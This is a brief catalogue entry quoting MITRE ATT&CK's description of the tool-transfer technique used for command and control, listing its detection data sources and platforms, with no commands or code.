Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre